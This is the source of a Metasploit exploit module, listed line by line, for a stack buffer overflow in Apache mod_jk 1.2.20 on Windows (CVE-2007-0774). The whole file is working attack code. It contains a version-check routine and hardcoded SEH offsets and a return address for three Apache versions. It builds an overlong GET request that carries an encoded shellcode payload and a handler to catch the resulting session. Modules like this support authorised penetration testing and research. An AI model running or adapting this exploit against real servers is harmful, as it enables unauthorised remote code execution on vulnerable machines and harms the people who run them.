Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Apache mod_jk 1.2.20 Buffer Overflow',
15
      'Description'    => %q{
16
          This is a stack buffer overflow exploit for mod_jk 1.2.20.
17
        Should work on any Win32 OS.
18
      },
19
      'Author'         => 'Nicob <nicob[at]nicob.net>',
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          [ 'CVE', '2007-0774' ],
24
          [ 'OSVDB', '33855' ],
25
          [ 'BID', '22791' ],
26
          [ 'ZDI', '07-008' ]
27
        ],
28
      'DefaultOptions' =>
29
        {
30
          'EXITFUNC' => 'process',
31
        },
32
      'Privileged'     => true,
33
      'Payload'        =>
34
        {
35
          'Space'    => 4000,
36
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c",
37
          'DisableNops' => true
38
        },
39
      'Platform'       => 'win',
40
      'Targets'        =>
41
        [
42
          # POP/POP/RET in mod_jk 1.2.20 (Apache 1.3.37, 2.0.58 and 2.2.3)
43
          ['mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)', { 'Ret' => 0x6a6b8ef1 }],
44
        ],
45
      'DefaultTarget'  => 0,
46
      'DisclosureDate' => '2007-03-02'))
47

48
    register_options(
49
      [
50
        Opt::RPORT(80)
51
      ])
52
  end
53

54
  def check
55
    connect
56

57
    sock.put("GET / HTTP/1.0\r\n\r\n")
58
    resp = sock.get_once
59
    disconnect
60

61
      if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1\.2\.20/))) then
62
        vprint_status("Apache version detected : #{m[1]}")
63
        return Exploit::CheckCode::Appears
64
      else
65
        return Exploit::CheckCode::Safe
66
      end
67
  end
68

69
  def exploit
70
    connect
71

72
    uri_start  = "GET /"
73
    uri_end    = ".html HTTP/1.0\r\n\r\n"
74
    sc_base    = 16
75

76
    shellcode  = payload.encoded
77
    sploit     = rand_text_alphanumeric(5001)
78
    sploit[sc_base, shellcode.length] = shellcode
79

80
    # 4343 : Apache/1.3.37 (Win32) mod_jk/1.2.20
81
    # 4407 : Apache/2.0.59 (Win32) mod_jk/1.2.20
82
    # 4423 : Apache/2.2.3  (Win32) mod_jk/1.2.20
83

84
    [ 4343, 4407, 4423 ].each { |seh_offset|
85
      sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V')
86
      sploit[seh_offset - 4, 2] = "\xeb\xf9"
87
      sploit[seh_offset    , 4] = [ target.ret ].pack('V')
88
    }
89

90
    print_status("Trying target #{target.name}...")
91
    sock.put(uri_start + sploit + uri_end)
92

93
    resp = sock.get_once
94
    if (resp and (m = resp.match(/<title>(.*)<\/title>/i)))
95
      print_error("The exploit failed : HTTP Status Code '#{m[1]}' received :-(")
96
    end
97

98
    handler
99
    disconnect
100
  end
101
end
102

103